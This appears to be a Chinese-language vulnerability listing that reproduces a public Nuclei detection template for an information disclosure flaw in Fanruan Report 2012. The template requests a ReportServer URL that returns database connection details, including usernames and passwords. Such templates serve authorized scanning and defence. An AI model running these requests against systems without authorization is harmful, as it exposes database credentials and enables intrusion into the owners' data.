fanruanoa2012-disclosure: Fanruan Report 2012 Information Disclosure

日期: 2025-08-01 | 影响软件: Fanruan Report 2012 | POC: 已公开

漏洞描述

Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL

PoC代码[已公开]

id: fanruanoa2012-disclosure

info:
  name: Fanruan Report 2012 Information Disclosure
  author: YanYun
  severity: high
  description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html
  metadata:
    max-request: 2
  tags: oa,java,fanruan,disclosure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"
      - "{{BaseURL}}/WebReport/ReportServer?op=fr_server&cmd=sc_getconnectioninfo"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"connection"'
          - '"name"'
          - '"driver"'
          - '"password"'
          - '"url"'
          - '"user"'
        condition: and

      - type: word
        words:
          - "application/json"
        part: header
# digest: 4a0a0047304502204cef45eee84aed3b4efc76d963e3a018449d928fba58ea9f3c616c648b3c8d79022100cc3cb210ee3e2f1a5902c6149606d2dfadcc900a3ae1ce8ac93bd158e476d6cb:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/other/fanruanoa2012-disclosure.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐